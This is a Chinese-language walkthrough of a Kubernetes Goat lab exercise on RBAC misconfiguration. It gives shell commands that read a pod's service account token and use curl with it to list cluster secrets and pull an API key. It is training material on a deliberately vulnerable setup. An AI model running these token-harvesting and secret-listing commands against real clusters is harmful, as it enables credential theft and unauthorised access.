categories: []
date: '2023-10-31T15:05:46.254047+08:00'
tags: []
title: Kubernetes Goat 16 - RBAC least privileges misconfiguration
updated: 2023-10-31T15:5:45.943+8:0

RBAC least privileges misconfiguration

RBAC 最低特权配置错误

  • 由于Kubernetes默认情况下将所有secretstokensservice accounts信息都存储在一个固定的目录。直接访问这个目录,查找敏感的信息:
cd /var/run/secrets/kubernetes.io/serviceaccount/

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-31_14-56-54_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 要指向内部 API 服务器主机名,我们可以从环境变量中导出它
export APISERVER=https://${KUBERNETES_SERVICE_HOST}
  • 设置 ServiceAccount 令牌的路径
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
  • 设置命名空间值
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
  • 读取 ServiceAccount token
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
  • 指向 ca.crt 路径,以便我们可以在 curl 请求中查询时使用它
export CACERT=${SERVICEACCOUNT}/ca.crt
  • 现在我们可以使用令牌和构造的查询来探索 Kubernetes API
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-31_15-03-01_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 要查询默认命名空间中的可用机密,请运行以下命令
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/secrets

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-31_15-03-37_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 查询特定于命名空间的秘密
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets
  • 从secrets中获取k8svaulapikey值
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets | grep k8svaultapikey 

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-31_15-04-54_d41d8cd98f00b204e9800998ecf8427e.jpg